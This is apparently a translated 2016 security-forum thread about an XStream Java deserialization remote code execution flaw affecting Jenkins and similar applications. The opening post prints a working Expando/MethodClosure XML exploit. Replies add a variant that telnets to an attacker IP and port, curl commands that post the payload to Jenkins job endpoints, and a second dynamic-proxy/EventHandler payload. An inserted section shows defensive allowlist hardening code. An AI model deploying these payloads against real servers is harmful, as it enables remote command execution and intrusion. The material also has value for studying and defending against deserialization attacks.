Yet Another Java Deserialization Vulnerability: XStream

XStream is a well-known and widely used serialization/deserialization library; the original write-up uses Jenkins as its example. In practice XStream can also be found in JIRA, Confluence, Bamboo, and even Spring and Struts.
The author found that the problem lies in how groovy.util.Expando overrides hashCode:
public int hashCode() {
  Object method = getProperties().get("hashCode");
  if (method != null && method instanceof Closure) {
    // invoke overridden hashCode closure method
    Closure closure = (Closure) method;
    closure.setDelegate(this);
    Integer ret = (Integer) closure.call();
    return ret.intValue();
  } else {
    return super.hashCode();
  }
}

When the Expando holds a closure object, Expando uses that closure to compute and return its hashCode. Since the closure object is attacker-controlled, this is enough to run our code.
So the author provides an EXP: when XStream parses the following snippet, Calculator pops up:
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <!-- This tells Expando to use our closure when it computes hashCode -->
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <!-- Performs the action of opening Calculator (it could of course be something else!) -->
            <owner class="java.lang.ProcessBuilder">
              <command>
                <string>open</string>
                <string>/Applications/Calculator.app</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </owner>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>1</int>
  </entry>
</map>

The execution chain given:
MapConverter#populateMap() calls HashMap#put()
HashMap#put() calls Expando#hashCode()
Expando#hashCode() calls MethodClosure#call()
MethodClosure#call() calls MethodClosure#doCall()
MethodClosure#doCall() calls InvokerHelper#invokeMethod()
InvokerHelper#invokeMethod() calls ProcessBuilder#start()
The essence of the EXP is that the action runs inside MethodClosure#call(): tainted data is passed in and arbitrary code executes.
Details:
https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream?platform=hootsuite
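Added example (not from the post or the Contrast write-up): the defender-side fix is XStream's security framework (1.4.7 and later), a deny-all default plus an explicit allowlist of the types the application really reads, so the `groovy.util.Expando` document above and the `dynamic-proxy`/`EventHandler` variant quoted in reply 22 are both stopped at the first unlisted element, before any converter or hashCode runs. `JobConfig` and the `jobConfig` alias are assumed placeholders for the application's own type; the probes assume Groovy is on the classpath, as it would be in an affected app.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;
import java.util.Collection;
import java.util.Map;

public class HardenedXStream {
    // Hypothetical application type: the only non-JDK class this app needs to read.
    public static class JobConfig { public String name; public int retries; }

    public static XStream hardened() {
        XStream xs = new XStream();
        xs.addPermission(NoTypePermission.NONE);              // deny every type first
        xs.addPermission(NullPermission.NULL);                // then re-allow the basics
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES); // int, boolean, ... and wrappers
        xs.allowTypes(new Class[]{String.class, JobConfig.class});
        xs.allowTypeHierarchy(Collection.class);              // <sorted-set>, <list>, ...
        xs.allowTypeHierarchy(Map.class);                     // <map> is fine; Expando inside it is not
        xs.alias("jobConfig", JobConfig.class);
        return xs;
    }

    // Constructed probes: the outer shape of the posted documents without the
    // MethodClosure/ProcessBuilder body. Assumes Groovy is on the classpath; without it
    // XStream fails even earlier with CannotResolveClassException.
    static final String EXPANDO_PROBE =
        "<map><entry><groovy.util.Expando/><int>1</int></entry></map>";
    static final String PROXY_PROBE =
        "<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface>"
        + "<handler class=\"java.beans.EventHandler\"/></dynamic-proxy></sorted-set>";

    // True when the security framework stopped unmarshalling; for nested elements XStream
    // may wrap the ForbiddenClassException in a ConversionException, so walk the causes.
    public static boolean rejectedByAllowlist(XStream xs, String xml) {
        try {
            xs.fromXML(xml);
            return false;
        } catch (RuntimeException e) {
            for (Throwable t = e; t != null; t = t.getCause())
                if (t instanceof ForbiddenClassException) return true;
            throw e; // any other failure is surfaced, not masked
        }
    }

    public static void main(String[] args) {
        XStream xs = hardened();
        System.out.println("Expando probe rejected: " + rejectedByAllowlist(xs, EXPANDO_PROBE));
        System.out.println("dynamic-proxy probe rejected: " + rejectedByAllowlist(xs, PROXY_PROBE));
        JobConfig ok = (JobConfig) xs.fromXML("<jobConfig><name>build</name><retries>2</retries></jobConfig>");
        System.out.println("legitimate document still loads: " + ok.name + "/" + ok.retries);
    }
}
```

Both probes print `true` and the legitimate document still loads; allowing `Map`/`Collection` hierarchies is a convenience, and the strictest form lists only the concrete classes actually used.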

22 replies
  1. 1# hkAssassin | 2016-02-26 11:28

    66666

  2. 2# _Thorns (startup hiring sysadmin, software reversing and data-visualization engineers.) | 2016-02-26 11:29

    Marking this first.

  3. 3# 坏男孩-A_A | 2016-02-26 11:35

    mark

  4. 4# 坏男孩-A_A | 2016-02-26 11:37

    Code auditing is going to be a lot of fun now.

  5. 5# 我是壮丁 (professional passer-by) | 2016-02-26 11:42

    Now I have something to do this weekend...

  6. 6# Grani | 2016-02-26 11:47

    mark

  7. 7# 爱上平顶山 (IT grunt, professional brick-mover, hole-digger, a nobody, can't do anything~) | 2016-02-26 11:48

    ...........

  8. 8# Kuuki | 2016-02-26 12:20

    <map>
      <entry>
        <groovy.util.Expando>
          <expandoProperties>
            <entry>
              <string>hashCode</string>
              <org.codehaus.groovy.runtime.MethodClosure>
                <delegate class="groovy.util.Expando" reference="../../../.."/>
                <owner class="java.lang.ProcessBuilder">
                  <command>
                    <string>telnet</string>
                    <string>***IP***</string>
                    <string>***PORT***</string>
                  </command>
                  <redirectErrorStream>false</redirectErrorStream>
                </owner>
                <resolveStrategy>0</resolveStrategy>
                <directive>0</directive>
                <parameterTypes/>
                <maximumNumberOfParameters>0</maximumNumberOfParameters>
                <method>start</method>
              </org.codehaus.groovy.runtime.MethodClosure>
            </entry>
          </expandoProperties>
        </groovy.util.Expando>
        <int>1</int>
      </entry>
    </map>

  9. 9# 隐形人真忙 (focused on security R&D and vulnerabilities) | 2016-02-26 12:50

    @我是壮丁 Aren't you always busy on weekends? :D

  10. 10# Bhunter | 2016-02-26 12:53

    The sorrow of not understanding any of this.

  11. 11# LoveSnow (I'll work hard and try to build my own killer tool) | 2016-02-26 13:00

    Marking first.

  12. 12# ghy459 (Dig deep holes, stockpile shells.) | 2016-02-26 13:27

    @Kuuki Why are you so badass?

  13. 13# tig3r | 2016-02-26 14:22

    1. curl -X POST "http://jenkins/job/test/config.xml" --data-binary xml文件 -H "Content-Type: text/xml"
    2. curl -X POST "http://jenkins/createItem?name=test" --data-binary xml文件 -H "Content-Type: text/xml"
    3. ...a whole bunch of other endpoints

  14. 14# PiaCa (ﻬ10wb, please rename PiaCa to piaca) | 2016-02-26 14:32

    @tig3r Is there any endpoint that doesn't require privileges?

  15. 15# tig3r | 2016-02-26 14:41

    @PiaCa Haven't found one; if anyone does, please share it here.

  16. 16# 隐形人真忙 (focused on security R&D and vulnerabilities) | 2016-02-26 15:29

    @PiaCa @tig3r That blog post only gives Jenkins as one example; in theory any app that uses both XStream and Groovy is affected.
    Are all the Java web experts quietly making a fortune?

  17. 17# Mayter | 2016-02-26 16:21

    mark

  18. 18# ’‘Nome (<>?:"{}!%^#&* see anything in that?) | 2016-02-26 16:23

    Thanks

  19. 19# f4ckbaidu (wtf) | 2016-02-26 16:57

    This has been around since 2013 = =
    http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/

  20. 20# 打电话叫人 (no worries, call for backup) | 2016-02-27 07:45

    m

  21. 21# Fire ant | 2016-02-27 09:38

    Actually, I've always wanted to ask: how do you get a reverse shell when the target is Windows.....

  22. 22# 七叶 | 2016-02-27 13:29

    The root cause is in XStream itself; there are two ways to trigger it from the upper layer
    1. sort-map: proxy interception execution
    String payload =
    "<sorted-set>" +
        "<string>littlehann</string>" +
        "<dynamic-proxy>" +
        "<interface>java.lang.Comparable</interface>" +
        "<handler class=\"java.beans.EventHandler\">" +
            " <target class=\"java.lang.ProcessBuilder\">" +
            " <command>" +
                " <string>notepad.exe</string>" +
            " </command>" +
            " </target>" +
            " <action>start</action>" +
        "</handler>" +
        "</dynamic-proxy>" +
    "</sorted-set>";

    2. Groovy closure overriding hashCode
    String payload =
    "<map>" +
    "  <entry>" +
    "    <groovy.util.Expando>" +
    "      <expandoProperties>" +
    "        <entry>" +
    "          <string>hashCode</string>" +
    "          <org.codehaus.groovy.runtime.MethodClosure>" +
    "            <delegate class=\"groovy.util.Expando\" reference=\"../../../..\"/>" +
    "            <owner class=\"java.lang.ProcessBuilder\">" +
    "              <command>" +
    "                <string>notepad.exe</string>" +
    "              </command>" +
    "              <redirectErrorStream>false</redirectErrorStream>" +
    "            </owner>" +
    "            <resolveStrategy>0</resolveStrategy>" +
    "            <directive>0</directive>" +
    "            <parameterTypes/>" +
    "            <maximumNumberOfParameters>0</maximumNumberOfParameters>" +
    "            <method>start</method>" +
    "          </org.codehaus.groovy.runtime.MethodClosure>" +
    "        </entry>" +
    "      </expandoProperties>" +
    "    </groovy.util.Expando>" +
    "    <int>1</int>" +
    "  </entry>" +
    "</map>";
